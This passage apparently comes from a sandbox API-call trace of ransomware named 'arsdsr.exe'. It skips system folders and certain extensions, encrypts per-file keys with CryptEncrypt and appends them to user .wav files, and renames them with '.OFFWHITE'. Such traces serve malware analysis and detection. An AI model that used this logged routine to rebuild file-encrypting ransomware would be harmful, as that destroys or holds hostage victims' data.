ftLastAccessTime.dwLowDateTime=0x277e45a0, ftLastAccessTime.dwHighDateTime=0x1d5db49, ftLastWriteTime.dwLowDateTime=0x277e45a0, ftLastWriteTime.dwHighDateTime=0x1d5db49, nFileSizeHigh=0x0, nFileSizeLow=0x6c2e, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="ZMJnq4AyBwW_Ef.wav", cAlternateFileName="ZMJNQ4~1.WAV")) returned 0 [0135.082] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0135.082] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7501260, ftCreationTime.dwHighDateTime=0x1d5dbd3, ftLastAccessTime.dwLowDateTime=0x2812ba70, ftLastAccessTime.dwHighDateTime=0x1d5e79f, ftLastWriteTime.dwLowDateTime=0x2812ba70, ftLastWriteTime.dwHighDateTime=0x1d5e79f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="S1XIz", cAlternateFileName="")) returned 0 [0135.082] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0135.082] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459c7020, ftCreationTime.dwHighDateTime=0x1d5e675, ftLastAccessTime.dwLowDateTime=0xe4797c30, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0xe4797c30, ftLastWriteTime.dwHighDateTime=0x1d5e222, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="I4kPj", cAlternateFileName="")) returned 1 [0135.082] lstrcmpiW (lpString1="I4kPj", lpString2=".") returned 1 [0135.082] lstrcmpiW (lpString1="I4kPj", lpString2="..") returned 1 [0135.082] lstrcmpiW (lpString1="I4kPj", lpString2="...") returned 1 [0135.082] lstrcmpiW (lpString1="I4kPj", lpString2="windows") returned -1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="$recycle.bin") returned 1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="rsa") returned -1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="ntuser.dat") returned -1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="programdata") returned -1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="appdata") returned 1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="program files") returned -1 [0135.083] lstrcmpiW (lpString1="I4kPj", lpString2="program files (x86)") returned -1 [0135.083] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0135.083] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="I4kPj" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj" [0135.083] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.083] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.083] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\*.*" [0135.083] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459c7020, ftCreationTime.dwHighDateTime=0x1d5e675, ftLastAccessTime.dwLowDateTime=0xe4797c30, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0xe4797c30, ftLastWriteTime.dwHighDateTime=0x1d5e222, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName=".", cAlternateFileName="")) returned 0x544650 [0135.085] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.085] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459c7020, ftCreationTime.dwHighDateTime=0x1d5e675, ftLastAccessTime.dwLowDateTime=0xe4797c30, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0xe4797c30, ftLastWriteTime.dwHighDateTime=0x1d5e222, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="..", cAlternateFileName="")) returned 1 [0135.085] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.085] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.085] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2b66c20, ftCreationTime.dwHighDateTime=0x1d5e37f, ftLastAccessTime.dwLowDateTime=0x1b26d6b0, ftLastAccessTime.dwHighDateTime=0x1d5e232, ftLastWriteTime.dwLowDateTime=0x1b26d6b0, ftLastWriteTime.dwHighDateTime=0x1d5e232, nFileSizeHigh=0x0, nFileSizeLow=0x1ab6, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="8xWLxx8VHf9p-.wav", cAlternateFileName="8XWLXX~1.WAV")) returned 1 [0135.085] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2=".") returned 1 [0135.085] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="..") returned 1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="...") returned 1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="windows") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="$recycle.bin") returned 1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="rsa") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="ntuser.dat") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="programdata") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="appdata") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="program files") returned -1 [0135.086] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="program files (x86)") returned -1 [0135.086] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.086] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="8xWLxx8VHf9p-.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav" [0135.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.086] PathFindExtensionW (pszPath="8xWLxx8VHf9p-.wav") returned=".wav" [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.086] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.087] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.087] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.087] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.087] lstrcmpiW (lpString1="8xWLxx8VHf9p-.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.087] GetProcessHeap () returned 0x500000 [0135.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318d0 [0135.087] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\8xwlxx8vhf9p-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.087] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=6838) returned 1 [0135.087] GetProcessHeap () returned 0x500000 [0135.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.087] GetProcessHeap () returned 0x500000 [0135.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.087] GetProcessHeap () returned 0x500000 [0135.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.087] GetProcessHeap () returned 0x500000 [0135.087] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.087] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.087] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.087] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.088] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.088] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.088] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.088] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.088] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.088] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.089] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.089] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1ab6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.089] SetLastError (dwErrCode=0x0) [0135.089] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.091] GetLastError () returned 0x0 [0135.091] GetLastError () returned 0x0 [0135.091] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1bb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.091] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.091] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1cb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.091] WriteFile (in: hFile=0x21c, lpBuffer=0x5318d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5318d0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.091] GetProcessHeap () returned 0x500000 [0135.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1ab6) returned 0x55a7b8 [0135.091] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.091] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1ab6, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x1ab6, lpOverlapped=0x0) returned 1 [0135.092] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.092] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1ab6, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x1ab6, lpOverlapped=0x0) returned 1 [0135.093] GetProcessHeap () returned 0x500000 [0135.093] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.093] CloseHandle (hObject=0x21c) returned 1 [0135.097] GetProcessHeap () returned 0x500000 [0135.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.097] GetProcessHeap () returned 0x500000 [0135.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.097] GetProcessHeap () returned 0x500000 [0135.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.097] GetProcessHeap () returned 0x500000 [0135.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.097] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav" [0135.098] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav.OFFWHITE" [0135.098] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\8xwlxx8vhf9p-.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\8xWLxx8VHf9p-.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\8xwlxx8vhf9p-.wav.offwhite")) returned 1 [0135.098] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d5ca3e0, ftCreationTime.dwHighDateTime=0x1d5e7c7, ftLastAccessTime.dwLowDateTime=0x682a1720, ftLastAccessTime.dwHighDateTime=0x1d5e1a5, ftLastWriteTime.dwLowDateTime=0x682a1720, ftLastWriteTime.dwHighDateTime=0x1d5e1a5, nFileSizeHigh=0x0, nFileSizeLow=0x142d2, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="9LQCxIk.wav", cAlternateFileName="")) returned 1 [0135.098] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2=".") returned 1 [0135.098] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="..") returned 1 [0135.098] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="...") returned 1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="windows") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="$recycle.bin") returned 1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="rsa") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="ntuser.dat") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="programdata") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="appdata") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="program files") returned -1 [0135.099] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="program files (x86)") returned -1 [0135.099] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.099] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="9LQCxIk.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav" [0135.099] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.099] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.099] PathFindExtensionW (pszPath="9LQCxIk.wav") returned=".wav" [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.099] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.100] lstrcmpiW (lpString1="9LQCxIk.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.100] GetProcessHeap () returned 0x500000 [0135.100] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318e0 [0135.100] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9lqcxik.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.101] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=82642) returned 1 [0135.101] GetProcessHeap () returned 0x500000 [0135.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.101] GetProcessHeap () returned 0x500000 [0135.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.101] GetProcessHeap () returned 0x500000 [0135.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.101] GetProcessHeap () returned 0x500000 [0135.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.101] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.101] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.101] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.101] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.101] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.101] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.101] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.101] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.101] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.102] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.102] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.102] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.102] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x142d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.102] SetLastError (dwErrCode=0x0) [0135.102] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.104] GetLastError () returned 0x0 [0135.104] GetLastError () returned 0x0 [0135.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x143d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.104] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x144d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.104] WriteFile (in: hFile=0x21c, lpBuffer=0x5318e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5318e0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.105] GetProcessHeap () returned 0x500000 [0135.105] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x142d2) returned 0x55a7b8 [0135.105] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.105] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x142d2, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x142d2, lpOverlapped=0x0) returned 1 [0135.110] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.110] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x142d2, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x142d2, lpOverlapped=0x0) returned 1 [0135.111] GetProcessHeap () returned 0x500000 [0135.111] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.111] CloseHandle (hObject=0x21c) returned 1 [0135.115] GetProcessHeap () returned 0x500000 [0135.115] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.115] GetProcessHeap () returned 0x500000 [0135.115] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.115] GetProcessHeap () returned 0x500000 [0135.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.116] GetProcessHeap () returned 0x500000 [0135.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.116] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav" [0135.116] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav.OFFWHITE" [0135.116] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9lqcxik.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9LQCxIk.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9lqcxik.wav.offwhite")) returned 1 [0135.117] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cf54aa0, ftCreationTime.dwHighDateTime=0x1d5da8f, ftLastAccessTime.dwLowDateTime=0x42ceb9e0, 